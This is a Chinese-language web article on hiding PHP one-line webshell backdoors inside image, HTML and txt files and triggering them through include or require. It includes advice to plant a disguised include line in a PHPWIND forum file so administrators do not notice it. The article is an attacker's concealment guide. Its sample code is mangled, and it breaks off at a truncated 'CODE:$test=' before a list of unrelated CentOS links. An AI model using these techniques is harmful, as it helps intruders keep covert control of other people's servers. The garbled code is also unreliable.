黑客隱藏 PHP 文件后門的技巧
最近很多朋友都在問我是否能把我那一句話木馬隱藏到HTML或圖片里,其實把一句話木馬插入到PHP文件中就已經很隱蔽了,如果說硬是要放到HTML文件
或圖片里,就接著往下看的這篇測試報告吧。
要知道如果光把PHP語句放到圖片里是無論如何也不能執行的,因為PHP只解析擴展名為php的文件。所以說要能使隱藏在圖片里的PHP語句執行。我們就
的借助PHP中的調用函數 :include 、require 等。
我們還記得前些日子把木馬隱藏到圖片的文章吧。也就是在PHP文件里用include("x.gif")這樣的語句來調用隱藏在圖片的木馬語句。ASP中語句也
類似。看似非常隱蔽但直接調用圖片對稍微懂
點PHP的人就不難發現可疑之處。由于URL 里用GET方式很難傳遞參數,這就使得插入木馬的性能得不到發揮。
Include 函數在PHP中使用的比較頻繁,所以引起的安全問題也實在太多,例如PHPWIND1.36的漏洞就是因為include后面的變量沒做過濾引起的。由
此我們就可以構造類似的語句來插入到PHP文件
中。然后把木馬隱藏到圖片或HTML文件里,可以說隱蔽性就更高了。如在PHPWIND論壇里插入下面的語句:
<‘’?@include includ/.$PHPWIND_ROOT;? >[Copy to clipboard]
一般管理員是無法看出來的。
有了include 函數來輔助幫忙我們就可以把PHP木馬隱藏到 諸如 txt、html和圖片文件等很多類型的文件里來了。因為txt、html和圖片文件這三種
類型的文件最無論在論壇還是文章系統里是最
為常見的了,下面我們就依次來做測試。
首先建立一PHP文件test.php 文件內容為:
CODE:$test=
[/url]
關鍵字:黑客 PHP 技巧
新文章:
- CentOS7下圖形配置網絡的方法
- CentOS 7如何添加刪除用戶
- 如何解決centos7雙系統后丟失windows啟動項
- CentOS單網卡如何批量添加不同IP段
- CentOS下iconv命令的介紹
- Centos7 SSH密鑰登陸及密碼密鑰雙重驗證詳解
- CentOS 7.1添加刪除用戶的方法
- CentOS查找/掃描局域網打印機IP講解
- CentOS7使用hostapd實現無AP模式的詳解
- su命令不能切換root的解決方法
- 解決VMware下CentOS7網絡重啟出錯
- 解決Centos7雙系統后丟失windows啟動項
- CentOS下如何避免文件覆蓋
- CentOS7和CentOS6系統有什么不同呢
- Centos 6.6默認iptable規則詳解